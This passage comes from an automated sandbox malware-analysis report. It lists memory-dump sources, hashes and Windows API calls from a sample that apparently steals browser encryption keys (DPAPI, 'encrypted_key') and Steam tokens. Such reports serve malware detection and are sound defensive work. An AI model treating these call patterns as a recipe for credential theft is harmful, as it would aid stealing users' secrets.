                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                            • String ID:
                            • API String ID: 174687898-0
                            • Opcode ID: 4a01b2d5ce95a469e310353bebc314f5ee2bff375c2b55748cff6eb069ab1092
                            • Instruction ID: e4ce308757b54e297030fc1fe4e3756c9d723c4aa2570d8506befccca981d5ca
                            • Opcode Fuzzy Hash: 4a01b2d5ce95a469e310353bebc314f5ee2bff375c2b55748cff6eb069ab1092
                            • Instruction Fuzzy Hash: B7414B71B056069BDB20CF69DC84BAAB3EAEB89305F1445AAEC49C7311E631E9009B51
                            APIs
                            • lstrcpy.KERNEL32(00000000), ref: 006D9CA8
                            • LocalAlloc.KERNEL32(00000040,?), ref: 006D9CDA
                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 006D9D03
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocLocallstrcpy
                            • String ID: $"encrypted_key":"$DPAPI
                            • API String ID: 2746078483-738592651
                            • Opcode ID: 4e20f4090cea08b232473124debfcc0076a63490e68934eca79f03769692aa8a
                            • Instruction ID: 7b7c7e929c5860c5463586fdff39772fee558f1483d18b048865292f3acd4693
                            • Opcode Fuzzy Hash: 4e20f4090cea08b232473124debfcc0076a63490e68934eca79f03769692aa8a
                            • Instruction Fuzzy Hash: 7341F271E1021A9BCB24EF65DC416EFB7B7EF54304F08546AE915AB352DA30ED00C7A0
                            APIs
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006EEA24
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EEA53
                            • lstrcat.KERNEL32(?,00000000), ref: 006EEA61
                            • lstrcat.KERNEL32(?,00701794), ref: 006EEA7A
                            • lstrcat.KERNEL32(?,010189B8), ref: 006EEA8D
                            • lstrcat.KERNEL32(?,00701794), ref: 006EEA9F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FolderPathlstrcpy
                            • String ID:
                            • API String ID: 818526691-0
                            • Opcode ID: d6099ddb93b93b41cfdae8b4d50235c16acda39881fe1f3b4c611c8986aae7d1
                            • Instruction ID: 322335c9c31c904ddb052f377b5f895759967fe4bf9bdd666987401b397a7afb
                            • Opcode Fuzzy Hash: d6099ddb93b93b41cfdae8b4d50235c16acda39881fe1f3b4c611c8986aae7d1
                            • Instruction Fuzzy Hash: 6341C3B1E20119AFCB61EB64DC42FEE73B9FF58300F004469BA1A97381DA709E449B94
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006EECDF
                            • lstrlen.KERNEL32(00000000), ref: 006EECF6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EED1D
                            • lstrlen.KERNEL32(00000000), ref: 006EED24
                            • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 006EED52
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID: steam_tokens.txt
                            • API String ID: 367037083-401951677
                            • Opcode ID: 14f79f7ecdcc63a162ac6831e7fbe151640c0be58386c2e2e69a721533d8cabe
                            • Instruction ID: 23ff443682aded22c82a7199bf13447ffef21e226dd95265bf957f4e5a3fc0ff
                            • Opcode Fuzzy Hash: 14f79f7ecdcc63a162ac6831e7fbe151640c0be58386c2e2e69a721533d8cabe
                            • Instruction Fuzzy Hash: 5A31E3B1E112565BC771BB7AEC1AAAE77A7EF20700F085129F806DB312DB24DC0587C8
                            APIs
                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,006D140E), ref: 006D9A9A
                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,006D140E), ref: 006D9AB0
                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,006D140E), ref: 006D9AC7
                            • ReadFile.KERNEL32(00000000,00000000,?,006D140E,00000000,?,?,?,006D140E), ref: 006D9AE0
                            • LocalFree.KERNEL32(?,?,?,?,006D140E), ref: 006D9B00
                            • CloseHandle.KERNEL32(00000000,?,?,?,006D140E), ref: 006D9B07
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                            • String ID:
                            • API String ID: 2311089104-0
                            • Opcode ID: e71343e77c7e58f6c3667cd93b6cd8174140e7a2b80204dba985c5cc744b83a8
                            • Instruction ID: 6d35b78ac2caab30b82a98bd1a21524ec57444011ad619e057d640c8957334f0
                            • Opcode Fuzzy Hash: e71343e77c7e58f6c3667cd93b6cd8174140e7a2b80204dba985c5cc744b83a8
                            • Instruction Fuzzy Hash: 1A115E71A1420AAFE710DFAADD89AAB737DEF05744F10425AF90596380EB709D00CBB0
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 006F5B14
                              • Part of subcall function 006FA173: std::exception::exception.LIBCMT ref: 006FA188
                              • Part of subcall function 006FA173: std::exception::exception.LIBCMT ref: 006FA1AE
                            • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 006F5B7C
                            • memmove.MSVCRT(00000000,?,?), ref: 006F5B89
                            • memmove.MSVCRT(00000000,?,?), ref: 006F5B98
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: vector<T> too long
                            • API String ID: 2052693487-3788999226
                            • Opcode ID: 82042bf0d543eb0c5dd16d66ce3ac50130c98300b528b2ed091e565b5fdabaa5
                            • Instruction ID: 74a8599fa03377a854c080960711bd9bb0e66692fe9bce3a856edd379cab1d2b
                            • Opcode Fuzzy Hash: 82042bf0d543eb0c5dd16d66ce3ac50130c98300b528b2ed091e565b5fdabaa5
                            • Instruction Fuzzy Hash: 0C4153B1B005199FCF04DF6CC995ABEB7E6EB89310F158269EA1AE7744D6309D018B90
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 006E7D58
                              • Part of subcall function 006FA1C0: std::exception::exception.LIBCMT ref: 006FA1D5
                              • Part of subcall function 006FA1C0: std::exception::exception.LIBCMT ref: 006FA1FB
                            • std::_Xinvalid_argument.LIBCPMT ref: 006E7D76
                            • std::_Xinvalid_argument.LIBCPMT ref: 006E7D91
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_$std::exception::exception
                            • String ID: invalid string position$string too long
                            • API String ID: 3310641104-4289949731
                            • Opcode ID: e181a5ac46fbbf754963b632dfef18cf8c9c3918aa272a75e131030279b5fef1
                            • Instruction ID: f84b2e97f4fcc9daac4460d4a387c245086fbf63b1ac8922510176f2f6b4ae74
                            • Opcode Fuzzy Hash: e181a5ac46fbbf754963b632dfef18cf8c9c3918aa272a75e131030279b5fef1
                            • Instruction Fuzzy Hash: F221E1723093448BD720DE6DEC80A7AF7E6EFA1720B204A6EE546CB381D770DC0487A5
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006F33EF
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006F33F6
                            • GlobalMemoryStatusEx.KERNEL32 ref: 006F3411
                            • wsprintfA.USER32 ref: 006F3437
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                            • String ID: %d MB
                            • API String ID: 2922868504-2651807785
                            • Opcode ID: 6b539f99a2b62aa219c4b545d36f2c5bde4babb575bac4dca8d5cf9c50e527b5
                            • Instruction ID: 3223c30b3b41568addfb225d8bf0d4e12a828fde57bed51dbc21ea3ba403ba4f
                            • Opcode Fuzzy Hash: 6b539f99a2b62aa219c4b545d36f2c5bde4babb575bac4dca8d5cf9c50e527b5
                            • Instruction Fuzzy Hash: 8E01D4B1B18218AFDB04DFA8DD49BBEB7BDFB45710F004229FA06E7380D774990086A5
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,0101E6B8,00000000,00020119,?), ref: 006ED7F5
                            • RegQueryValueExA.ADVAPI32(?,0101F238,00000000,00000000,00000000,000000FF), ref: 006ED819
                            • RegCloseKey.ADVAPI32(?), ref: 006ED823
                            • lstrcat.KERNEL32(?,00000000), ref: 006ED848
                            • lstrcat.KERNEL32(?,0101F250), ref: 006ED85C
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseOpenQueryValue
                            • String ID:
                            • API String ID: 690832082-0
                            • Opcode ID: 7eb03415b8a988124341e61db3ac1fd28012cd7400d2a60ab26708cd328bdbfb
                            • Instruction ID: be4de4ea234b8f29c4d2cbef5cc0d5df8973741425158a8989b83821d0c3bb8e
                            • Opcode Fuzzy Hash: 7eb03415b8a988124341e61db3ac1fd28012cd7400d2a60ab26708cd328bdbfb
                            • Instruction Fuzzy Hash: 0241B2B1A2020DAFCB94EF64EC86BDE7779EF54300F008069B54997351EE30AA85CF94
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 006E7F31
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E7F60
                            • StrCmpCA.SHLWAPI(00000000,00704C3C), ref: 006E7FA5
                            • StrCmpCA.SHLWAPI(00000000,00704C3C), ref: 006E7FD3
                            • StrCmpCA.SHLWAPI(00000000,00704C3C), ref: 006E8007
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 22e27b1e2165003bc439c2ad2beb68169ea563dd756d4b60b590a9eecb8ce514
                            • Instruction ID: f71b265a898c093b56af4540987894f34f47836ef5e06b751b860eb762f1b7ed
                            • Opcode Fuzzy Hash: 22e27b1e2165003bc439c2ad2beb68169ea563dd756d4b60b590a9eecb8ce514
                            • Instruction Fuzzy Hash: E641A170A0921ADFDB20DF69D480EAEB7B5FF54300B114199E809DB351DB70EA66CB91
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 006E80BB
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E80EA
                            • StrCmpCA.SHLWAPI(00000000,00704C3C), ref: 006E8102
                            • lstrlen.KERNEL32(00000000), ref: 006E8140
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E816F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
